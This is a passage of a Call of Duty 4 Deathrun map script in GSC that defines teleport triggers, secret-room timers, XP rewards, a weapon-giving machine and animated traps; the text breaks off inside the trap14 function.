main()
{
	
	maps\mp\_load::main(); 




	

	game["allies"] = "marines";
	game["axis"] = "opfor";
	game["attackers"] = "axis";
	game["defenders"] = "allies";
	game["allies_soldiertype"] = "desert";
	game["axis_soldiertype"] = "desert";

	setdvar( "r_specularcolorscale", "1" );

	setdvar("r_glowbloomintensity0",".25");
	setdvar("r_glowbloomintensity1",".25");
	setdvar("r_glowskybleedintensity0",".3");
	setdvar("compassmaxrange","1800");

	// Precache
	precacheItem( "rpg_mp" );
	precacheItem( "ak47_mp" );
	precacheItem( "remington700_mp" );
	precacheItem( "m40a3_mp" );
	precacheItem( "deserteagle_mp" );
	precacheItem( "winchester1200_mp" );
	precacheShader("black");
        precacheShader("white");

	
	if(!isdefined(level.music))
		level.music=[];

	level.music[0]["song"]	="Hoodie Allen - Interruption";
	level.music[0]["alias"]	="interruption";
	level.music[1]["song"]	="Our Last Night - Never Forget You";
	level.music[1]["alias"]	="forgetyou";
	level.music[2]["song"]	="Twenty One Pilots - Ride";
	level.music[2]["alias"]	="ride";
	level.music[3]["song"]	="Vanic X Machineheart - Circles";
	level.music[3]["alias"]	="circles";
	level.music[4]["song"]	="Razihel - Tick Tick Boom Boom";
	level.music[4]["alias"]	="ticktick";
	level.music[5]["song"]	="Tiest� - Wasted (Ummet Ozcan Remix)";
	level.music[5]["alias"]	="wasted";

	addTriggerToList("trig_trap1");
	addTriggerToList("trig_trap2");
	addTriggerToList("trig_trap3");
	addTriggerToList("trig_trap4");
	addTriggerToList("trig_trap5");
	addTriggerToList("trig_trap6");
	addTriggerToList("trig_trap7");
	addTriggerToList("trig_trap8");
	addTriggerToList("trig_trap9");
	addTriggerToList("trig_trap10");
	addTriggerToList("trig_trap11");
	addTriggerToList("trig_trap12");
	addTriggerToList("trig_trap13");
	addTriggerToList("trig_trap14");
	addTriggerToList("trig_trap15");

	thread musictrig();

	thread easy_enter();
	thread easyplus_enter();
	thread hard_enter();
	thread start_stairs();
	thread secret_room();
	thread easy_end();
	thread easyplus_end();
	thread hard_end();
	thread easy_sound();
	thread easyplus_sound();
	thread hard_sound();
	thread teddy_shoot1();
	thread teddy_shoot2();
	thread easy_fail1();
	thread easy_fail2();
	thread easy_fail3();
	thread easy_fail4();
	thread easy_fail5();
	thread easy_fail6();
	thread easy_fail7();
	thread easy_fail8();
	thread easyplus_fail1();
	thread easyplus_fail2();
	thread easyplus_fail3();
	thread easyplus_fail4();
	thread easyplus_fail5();
	thread easyplus_fail6();
	thread easyplus_fail7();
	thread easyplus_fail8();
	thread hard_fail1();
	thread hard_fail2();
	thread hard_fail3();
	thread hard_fail4();
	thread hard_fail5();
	thread hard_fail6();
	thread hard_fail7();
	thread hard_fail8();
	thread hard_fail9();
	thread acti_bounce1();
	thread acti_bounce2();
	thread acti_bounce3();
	thread acti_bounce4();
	thread acti_bounce5();
	thread acti_tele1();
	thread acti_tele1back();
	thread deagle_machine();
	thread acti_secret();
	thread bounce_r7001();
	thread bounce_r7002();
	thread trap1();
	thread trap2();
	thread trap3();
	thread trap4();
	thread trap5();
	thread trap6();
	thread trap7();
	thread trap8();
	thread trap9();
	thread trap10();
	thread trap11();
	thread trap12();
	thread trap13();
	thread trap14();
	thread trap15();
	thread trap8_mover();
	thread jump_room_battle();
	thread sniper_room_battle();
	thread knife_room_battle();
	thread weaproom();
	thread old_room_battle();
	thread sgun_room_battle();
	thread ak_room_battle();
	thread sgun_room_battle();
	thread rpg_room_battle();
	thread secret_rpg();
	thread creators();
	thread foo();
}
addTriggerToList(name)
{
    if(!isDefined(level.trapTriggers))
        level.trapTriggers=[];
    level.trapTriggers[level.trapTriggers.size]=getEnt(name,"targetname");
}
easy_enter()
{
	trig = getEnt ("easy_enter", "targetname");
	end = getEnt ("easy_enter_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);
	player thread easy_secrettimer();          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}

}
easyplus_enter()
{
	trig = getEnt ("easyplus_enter", "targetname");
	end = getEnt ("easyplus_enter_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);
	player thread easyplus_secrettimer();          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}

}
hard_enter()
{
	trig = getEnt ("hard_enter", "targetname");
	end = getEnt ("hard_enter_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);
	player thread hard_secrettimer();          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}

}
start_stairs()
{
	object = getEnt ("start_stairs", "targetname");
	wait 15;
	object movez(172,10);
}
secret_room()
{
	wall1 = getEnt ("s_wall1", "targetname");
	wall2 = getEnt ("s_wall2", "targetname");
	wall3 = getEnt ("s_wall3", "targetname");
	wall4 = getEnt ("s_wall4", "targetname");
	wall5 = getEnt ("s_wall5", "targetname");
	wall6 = getEnt ("s_wall6", "targetname");
	wall7 = getEnt ("s_wall7", "targetname");
	wall8 = getEnt ("s_wall8", "targetname");
	wall1 hide();
	wall2 hide();
	wall3 hide();
	wall4 hide();
	wall5 hide();
	wall6 hide();
	wall7 hide();
	wall8 hide();
	while(1)
	{
		wall1 show();
		 wait 0.4;
		wall1 hide();
		wall2 show();
		 wait 0.4;
		wall2 hide();
		wall3 show();
		 wait 0.4;
		wall3 hide();
		wall4 show();
		 wait 0.4;
		wall4 hide();
		wall5 show();
		 wait 0.4;
		wall5 hide();
		wall6 show();
		 wait 0.4;
		wall6 hide();
		wall7 show();
		 wait 0.4;
		wall7 hide();
		wall8 show();
		 wait 0.4;
		wall8 hide();
	}
}
easy_end()
{
	trig = getEnt ("easy_end","targetname");
	go = getEnt ("easy_end_go","targetname");
	out = getEnt ("easy_out","targetname");
	while(1)
    	{
        trig waittill ("trigger", player);
	player notify("easy_done");
	player.secretTimer destroy();
	player SetOrigin(go.origin);
        player SetPlayerAngles( go.angles );
	player braxi\_rank::giveRankXP("", 100);
	iPrintlnBold( " ^3" + player.name + " ^7Finished the ^5EASY ^7secret." );
	wait 10.5;        
	player SetOrigin(out.origin);
        player SetPlayerAngles( out.angles );
	}
}
easy_sound()
{
	trigger = getEnt ("easy_end","targetname");
	secret = getEnt ("secret_sound","targetname");
	while(1)
	{
		trigger waittill ("trigger", player);
		wait 0.2;
		secret playSound("callofduty");
	}
}
easyplus_end()
{
	trig = getEnt ("easyplus_end","targetname");
	go = getEnt ("easyplus_end_go","targetname");
	out = getEnt ("easyplus_out","targetname");
	while(1)
    	{
        trig waittill ("trigger", player);
	player notify("easyplus_done");      
	player.secretTimer2 destroy();
	player SetOrigin(go.origin);
        player SetPlayerAngles( go.angles );
	player braxi\_rank::giveRankXP("", 200);
	iPrintlnBold( " ^3" + player.name + " ^7Finished the ^5EASY+ ^7secret." );
	wait 10.5;        
	player SetOrigin(out.origin);
        player SetPlayerAngles( out.angles );
	}
}
easyplus_sound()
{
	trigger = getEnt ("easyplus_end","targetname");
	secret = getEnt ("secret_sound","targetname");
	while(1)
	{
		trigger waittill ("trigger", player);
		wait 0.2;
		secret playSound("callofduty");
	}
}

hard_end()
{
	trig = getEnt ("hard_end","targetname");
	go = getEnt ("hard_end_go","targetname");
	out = getEnt ("hard_out","targetname");
	while(1)
    	{
        trig waittill ("trigger", player);
	player notify("hard_done");
	player.secretTimer3 destroy();
	player SetOrigin(go.origin);
        player SetPlayerAngles( go.angles );
	player braxi\_rank::giveRankXP("", 1000);
	iPrintlnBold( " ^3" + player.name + " ^7Finished the ^1HARD ^7secret." );
	wait 10.5;        
	player SetOrigin(out.origin);
        player SetPlayerAngles( out.angles );
	}
}
hard_sound()
{
	trigger = getEnt ("hard_end","targetname");
	secret = getEnt ("secret_sound","targetname");
	while(1)
	{
		trigger waittill ("trigger", player);
		wait 0.2;
		secret playSound("callofduty");
	}
}
teddy_shoot1()
{
	trigger = getent("shortcut_open","targetname");
	object1 = getent("shortcutwall","targetname");
	object2 = getent("shortcut_ladder","targetname");
	object2 notsolid();
	trigger waittill ("trigger" , player );
	object1 notsolid();
	object2 solid();
	iprintln( "^5TeddySHoot!" );
}
teddy_shoot2()
{
	trigger = getent("secret_open","targetname");
	secret_clip = getEnt ("secret_clip","targetname");
	trigger waittill ("trigger" , player );
	secret_clip delete();
	iprintln( "^5TeddySHoot!" );
}
easy_fail1()
{
	trig = getEnt ("easy_fail1", "targetname");
	end = getEnt ("easy_fail1_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easy_fail2()
{
	trig = getEnt ("easy_fail2", "targetname");
	end = getEnt ("easy_fail2_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easy_fail3()
{
	trig = getEnt ("easy_fail3", "targetname");
	end = getEnt ("easy_fail3_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easy_fail4()
{
	trig = getEnt ("easy_fail4", "targetname");
	end = getEnt ("easy_fail4_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easy_fail5()
{
	trig = getEnt ("easy_fail5", "targetname");
	end = getEnt ("easy_fail5_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easy_fail6()
{
	trig = getEnt ("easy_fail6", "targetname");
	end = getEnt ("easy_fail6_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easy_fail7()
{
	trig = getEnt ("easy_fail7", "targetname");
	end = getEnt ("easy_fail7_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easy_fail8()
{
	trig = getEnt ("easy_fail8", "targetname");
	end = getEnt ("easy_fail8_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail1()
{
	trig = getEnt ("easyplus_fail1", "targetname");
	end = getEnt ("easyplus_fail1_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail2()
{
	trig = getEnt ("easyplus_fail2", "targetname");
	end = getEnt ("easyplus_fail2_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail3()
{
	trig = getEnt ("easyplus_fail3", "targetname");
	end = getEnt ("easyplus_fail3_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail4()
{
	trig = getEnt ("easyplus_fail4", "targetname");
	end = getEnt ("easyplus_fail4_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail5()
{
	trig = getEnt ("easyplus_fail5", "targetname");
	end = getEnt ("easyplus_fail5_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail6()
{
	trig = getEnt ("easyplus_fail6", "targetname");
	end = getEnt ("easyplus_fail6_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail7()
{
	trig = getEnt ("easyplus_fail7", "targetname");
	end = getEnt ("easyplus_fail7_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
easyplus_fail8()
{
	trig = getEnt ("easyplus_fail8", "targetname");
	end = getEnt ("easyplus_fail8_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail1()
{
	trig = getEnt ("hard_fail1", "targetname");
	end = getEnt ("hard_fail1_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail2()
{
	trig = getEnt ("hard_fail2", "targetname");
	end = getEnt ("hard_fail2_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail3()
{
	trig = getEnt ("hard_fail3", "targetname");
	end = getEnt ("hard_fail3_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail4()
{
	trig = getEnt ("hard_fail4", "targetname");
	end = getEnt ("hard_fail4_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail5()
{
	trig = getEnt ("hard_fail5", "targetname");
	end = getEnt ("hard_fail5_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail6()
{
	trig = getEnt ("hard_fail6", "targetname");
	end = getEnt ("hard_fail6_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail7()
{
	trig = getEnt ("hard_fail7", "targetname");
	end = getEnt ("hard_fail7_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail8()
{
	trig = getEnt ("hard_fail8", "targetname");
	end = getEnt ("hard_fail8_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
hard_fail9()
{
	trig = getEnt ("hard_fail9", "targetname");
	end = getEnt ("hard_fail9_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_bounce1()
{
	trig = getEnt ("acti_bounce1", "targetname");
	end = getEnt ("acti_bounce1_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_bounce2()
{
	trig = getEnt ("acti_bounce2", "targetname");
	end = getEnt ("acti_bounce2_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_bounce3()
{
	trig = getEnt ("acti_bounce3", "targetname");
	end = getEnt ("acti_bounce3_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_bounce4()
{
	trig = getEnt ("acti_bounce4", "targetname");
	end = getEnt ("acti_bounce4_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_bounce5()
{
	trig = getEnt ("acti_bounce5", "targetname");
	end = getEnt ("acti_bounce5_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_tele1()
{
	trig = getEnt ("acti_tele1", "targetname");
	end = getEnt ("acti_tele1_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_tele1back()
{
	trig = getEnt ("acti_tele1back", "targetname");
	end = getEnt ("acti_tele1back_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
deagle_machine()
{
	trigger = getEnt ( "deagle_machine", "targetname" );
	while(1)
        {
                trigger waittill ( "trigger", player );
                wait 0.05;
                player giveWeapon ( "deserteagle_mp" );
                player switchToWeapon ( "deserteagle_mp" );
                player giveMaxAmmo ( "deserteagle_mp" );
		wait 1;
	}
}
acti_secret()
{
	trigger = getEnt ( "acti_chicken", "targetname" );
	object = getEnt ( "acti_secret_block", "targetname" );
	trigger waittill ("trigger", player);
	player iPrintlnBold(" ^3You might want to go back...");
	object movex(-60,5);
	thread acti_secret_msg();
	thread acti_secret_tele();
	thread acti_secret_fin();
}
acti_secret_msg()
{
	trigger = getEnt ( "acti_secret_msg", "targetname" );
	trigger waittill ("trigger", player);
	player iPrintlnBold(" ^3Welcome to bounce room training!");
}
acti_secret_tele()
{
	trig = getEnt ("acti_secret_tele", "targetname");
	end = getEnt ("acti_secret_tele_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);          
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
acti_secret_fin()
{
	trig = getEnt ("acti_secret_fin", "targetname");
	object = getEnt ( "acti_secret_mover", "targetname" );
	end = getEnt ("acti_secret_fin_go", "targetname");
	while(1)
    	{
        trig waittill ("trigger", player);
	player braxi\_rank::giveRankXP("", 100);
	player iPrintlnBold( " ^3 You finished the bounce room training!" ); 
	object movex(60,0.1);
	object waittill ("movedone");     
	player SetOrigin(end.origin);
        player SetPlayerAngles( end.angles );
	}
}
jump_room_gun()
{
	trigger = getEnt ( "bounce_room_gun", "targetname" );
	while(1)
        {
                trigger waittill ( "trigger", player );
                wait 0.05;
                player giveWeapon ( "remington700_mp" );
		player giveMaxAmmo ( "remington700_mp" );
                player switchToWeapon ( "remington700_mp" );
           	wait 1;
	}
}
bounce_r7001()
{
	object = getEnt("bounce_r700","targetname");
	while(1)
	{
		object rotateyaw(720,6);
		object waittill ("rotatedone");
	}
}
bounce_r7002()
{
	object = getEnt("bounce_r700","targetname");
	object movez(4,1.5);
	while(1)
	{
		object movez(-8,1.5);
		object waittill ("movedone");
		object movez(8,1.5);
		object waittill ("movedone");
	}
}
trap1()
{
	trigger = getent("trig_trap1","targetname");
	object = getent("trap1_spikes","targetname");
	killtrigger = getent ("trap1_killtrig" , "targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	killtrigger enablelinkto ();
	killtrigger linkto (object);
	object movez(53, 1);
	object waittill("movedone");
	wait 6;
	object movez(-53, 1);
	object waittill("movedone");
	wait 1;
}
trap2()
{
	trigger = getent("trig_trap2","targetname");
	object = getent("trap2","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	object delete();
}
trap3()
{
	trigger = getent("trig_trap3","targetname");
	object = getent("trap3","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	while(1)
	{
		object movez(115, 2);
		object waittill ("movedone");
		object movez(-115,2);
		object waittill ("movedone");
		wait 5;
	}
}
trap4()
{	
	trigger = getent("trig_trap4","targetname");
	object = getent("trap4","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	object movez(244,1);
	object rotateyaw(360,1);
	object waittill ("movedone");
	object movez(-244,3);
	object rotateyaw(-1080,3);
	object waittill ("movedone");
	while(1)
	{
		object rotateYaw(3240, 6);
		object waittill("rotatedone");
		wait 5;
		object rotateYaw(-3240, 6);
		object waittill("rotatedone");
		wait 5;
	}
}
trap5()
{
	trigger = getEnt ( "trig_trap5", "targetname" );
	object1 = getEnt ( "trap5_bou1", "targetname" );
	object2 = getEnt ( "trap5_bou2", "targetname" );
	trigger waittill ( "trigger", player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	
	i = randomintrange( 0, 2 );
	if(i == 0)
	{
		object1 delete();
	}
	else if(i == 1)
	{
		object2 delete();

	}
}
trap6()
{
	trigger = getent("trig_trap6","targetname");
	object1 = getent("trap6_spikes1","targetname");
	object2 = getent("trap6_spikes2","targetname");
	object3 = getent("trap6_spikes3","targetname");
	object4 = getent("trap6_spikes4","targetname");
	killtrigger1 = getent ("trap6_killtrig1" , "targetname");
	killtrigger2 = getent ("trap6_killtrig2" , "targetname");
	killtrigger3 = getent ("trap6_killtrig3" , "targetname");
	killtrigger4 = getent ("trap6_killtrig4" , "targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	killtrigger1 enablelinkto ();
	killtrigger1 linkto (object1);
	killtrigger2 enablelinkto ();
	killtrigger2 linkto (object2);
	killtrigger3 enablelinkto ();
	killtrigger3 linkto (object3);
	killtrigger4 enablelinkto ();
	killtrigger4 linkto (object4);
	object1 movez(36, 1);
	object2 movez(36, 1);
	object3 movez(36, 1);
	object4 movez(36, 1);
	object4 waittill("movedone");
	wait 5;
	object1 movez(-36, 1);
	object2 movez(-36, 1);
	object3 movez(-36, 1);
	object4 movez(-36, 1);
	object4 waittill("movedone");
	while(1)
	{
		object1 movez(36, 1.5);
		object1 waittill("movedone");
		object1 movez(-36, 1.5);
		object1 waittill("movedone");
		object2 movez(36, 1.5);
		object2 waittill("movedone");
		object2 movez(-36, 1.5);
		object2 waittill("movedone");
		object3 movez(36, 1.5);
		object3 waittill("movedone");
		object3 movez(-36, 1.5);
		object3 waittill("movedone");
		object4 movez(36, 1.5);
		object4 waittill("movedone");
		object4 movez(-36, 1.5);
		object4 waittill("movedone");
	}
}
trap7()
{
	trigger = getent("trig_trap7","targetname");
	object = getent("trap7","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	object notsolid();
}
trap8()
{
	trigger = getent("trig_trap8","targetname");
	object = getent("trap8","targetname");
	object notsolid();
	object hide();
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	object show();
	object solid();
}
trap8_mover()
{
	object = getent("trap8_mover","targetname");
	while(1)
	{
		object movey(781,5);
		object waittill ("movedone");
		wait 3;
		object movey(-781,5);
		object waittill ("movedone");
		wait 3;
	}
}
trap9()
{
	trigger = getEnt ( "trig_trap9", "targetname" );
	object1 = getEnt ( "trap9_1", "targetname" );
	object2 = getEnt ( "trap9_2", "targetname" );
	object3 = getEnt ( "trap9_3", "targetname" );
	object4 = getEnt ( "trap9_4", "targetname" );
	object5 = getEnt ( "trap9_5", "targetname" );
	object6 = getEnt ( "trap9_6", "targetname" );
	object7 = getEnt ( "trap9_7", "targetname" );
	object8 = getEnt ( "trap9_8", "targetname" );
	object9 = getEnt ( "trap9_9", "targetname" );
	trigger waittill ( "trigger", player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	
	i = randomintrange( 0, 5 );
	if(i == 0)
	{
		thread trap9_mover1();
		thread trap9_mover2();
		thread trap9_mover3();
		thread trap9_mover4();
		thread trap9_mover5();
		thread trap9_mover6();
		thread trap9_mover7();
		thread trap9_mover8();
		thread trap9_mover9();
	}
	else if(i == 1)
	{
		object1 notsolid();
		object5 notsolid();
		object7 notsolid();

	}
	else if(i == 2)
	{
		object2 notsolid();
		object4 notsolid();
		object8 notsolid();
	}
	else if(i == 3)
	{
		object1 delete();
		object4 delete();
		object7 delete();
		object3 movex(-100,1);
		object6 movex(-100,1);
		object9 movex(-100,1);
		object9 waittill ("movedone");
		while(1)
		{
			object3 movex(202,2);
			object6 movex(202,2);
			object9 movex(202,2);
			object9 waittill ("movedone");
			object3 movex(-202,2);
			object6 movex(-202,2);
			object9 movex(-202,2);
			object9 waittill ("movedone");
		}
			
	}
	else if(i == 4)
	{
		object3 delete();
		object6 delete();
		thread trap9_floor1();
		thread trap9_floor2();
		thread trap9_floor3();
		thread trap9_floor4();
		thread trap9_floor5();
		thread trap9_floor6();
	}
}
trap9_mover1()
{
	object1 = getEnt ("trap9_1","targetname");
	while(1)
	{
		object1 movey(48,0.5);
		object1 waittill ("movedone");
		object1 movex(-48,0.5);
		object1 waittill ("movedone");
		object1 movey(-48,0.5);
		object1 waittill ("movedone");
		object1 movex(48,0.5);
		object1 waittill ("movedone");
	}
}
trap9_mover2()
{
	object1 = getEnt ("trap9_2","targetname");
	while(1)
	{
		object1 movey(48,0.5);
		object1 waittill ("movedone");
		object1 movex(48,0.5);
		object1 waittill ("movedone");
		object1 movey(-48,0.5);
		object1 waittill ("movedone");
		object1 movex(-48,0.5);
		object1 waittill ("movedone");
	}
}
trap9_mover3()
{
	object1 = getEnt ("trap9_3","targetname");
	while(1)
	{
		object1 rotateyaw(360,4);
		object1 waittill ("rotatedone");
	}
}
trap9_mover4()
{
	object1 = getEnt ("trap9_4","targetname");
	while(1)
	{
		object1 movey(48,0.5);
		object1 waittill ("movedone");
		object1 movex(-48,0.5);
		object1 waittill ("movedone");
		object1 movey(-48,0.5);
		object1 waittill ("movedone");
		object1 movex(48,0.5);
		object1 waittill ("movedone");
	}
}
trap9_mover5()
{
	object1 = getEnt ("trap9_5","targetname");
	while(1)
	{
		object1 movey(48,0.5);
		object1 waittill ("movedone");
		object1 movex(48,0.5);
		object1 waittill ("movedone");
		object1 movey(-48,0.5);
		object1 waittill ("movedone");
		object1 movex(-48,0.5);
		object1 waittill ("movedone");
	}
}
trap9_mover6()
{
	object1 = getEnt ("trap9_6","targetname");
	while(1)
	{
		object1 rotateyaw(-360,4);
		object1 waittill ("rotatedone");
	}
}
trap9_mover7()
{
	object1 = getEnt ("trap9_7","targetname");
	while(1)
	{
		object1 movey(48,0.5);
		object1 waittill ("movedone");
		object1 movex(-48,0.5);
		object1 waittill ("movedone");
		object1 movey(-48,0.5);
		object1 waittill ("movedone");
		object1 movex(48,0.5);
		object1 waittill ("movedone");
	}
}
trap9_mover8()
{
	object1 = getEnt ("trap9_8","targetname");
	while(1)
	{
		object1 movey(48,0.5);
		object1 waittill ("movedone");
		object1 movex(48,0.5);
		object1 waittill ("movedone");
		object1 movey(-48,0.5);
		object1 waittill ("movedone");
		object1 movex(-48,0.5);
		object1 waittill ("movedone");
	}
}
trap9_mover9()
{
	object1 = getEnt ("trap9_9","targetname");
	while(1)
	{
		object1 rotateyaw(360,4);
		object1 waittill ("rotatedone");
	}
}
trap9_floor1()
{
	object1 = getEnt ("trap9_1","targetname");
	while(1)
	{
		object1 movey(924,6);
		object1 waittill("movedone");
		object1 movex(186,0.5);
		object1 waittill("movedone");
		object1 movey(-924,6);
		object1 waittill("movedone");
		object1 movex(-186,0.5);
		object1 waittill("movedone");
	}
}
trap9_floor2()
{
	object1 = getEnt ("trap9_4","targetname");
	while(1)
	{
		object1 movey(462,3);
		object1 waittill ("movedone");
		object1 movex(186,0.5);
		object1 waittill("movedone");
		object1 movey(-924,6);
		object1 waittill("movedone");
		object1 movex(-186,0.5);
		object1 waittill("movedone");
		object1 movey(462,3);
		object1 waittill("movedone");
	}
}
trap9_floor3()
{
	object1 = getEnt ("trap9_7","targetname");
	while(1)
	{
		object1 movex(186,0.5);
		object1 waittill("movedone");
		object1 movey(-924,6);
		object1 waittill("movedone");
		object1 movex(-186,0.5);
		object1 waittill("movedone");
		object1 movey(924,6);
		object1 waittill("movedone");
	}
}
trap9_floor4()
{
	object1 = getEnt ("trap9_8","targetname");
	while(1)
	{
		object1 movey(-924,6);
		object1 waittill("movedone");
		object1 movex(-186,0.5);
		object1 waittill("movedone");
		object1 movey(924,6);
		object1 waittill("movedone");
		object1 movex(186,0.5);
		object1 waittill("movedone");
	}
}
trap9_floor5()
{
	object1 = getEnt ("trap9_5","targetname");
	while(1)
	{
		object1 movey(-462,3);
		object1 waittill ("movedone");
		object1 movex(-186,0.5);
		object1 waittill("movedone");
		object1 movey(924,6);
		object1 waittill("movedone");
		object1 movex(186,0.5);
		object1 waittill("movedone");
		object1 movey(-462,3);
		object1 waittill("movedone");

	}
}
trap9_floor6()
{
	object1 = getEnt ("trap9_2","targetname");
	while(1)
	{
		object1 movex(-186,0.5);
		object1 waittill("movedone");
		object1 movey(924,6);
		object1 waittill("movedone");
		object1 movex(186,0.5);
		object1 waittill("movedone");
		object1 movey(-924,6);
		object1 waittill("movedone");
	}
}
trap10()
{
	trigger = getent("trig_trap10","targetname");
	object = getent("trap10","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	object delete();
}
trap11()
{
	trigger = getent("trig_trap11","targetname");
	object = getent("trap11_mover","targetname");
	killtrig = getent("trap11_killtrig","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	killtrig movez(-55,0.1);
	object movez(-54,5);
	object waittill ("movedone");
	killtrig delete();
}
trap12()
{
	trigger = getent("trig_trap12","targetname");
	object = getent("trap12","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	while(1)
	{
		object rotateyaw(360,1);
		object waittill ("rotatedone");
		object rotateyaw(360,10);
		object waittill ("rotatedone");
		object rotateyaw(-360,1);
		object waittill ("rotatedone");
		object rotateyaw(-360,10);
	}
}
trap13()
{
	trigger = getent("trig_trap13","targetname");
	object = getent("trap13","targetname");
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	object delete();
}
trap14()
{
	trigger = getEnt ( "trig_trap14", "targetname" );
	object1 = getEnt ( "trap14_1", "targetname" );
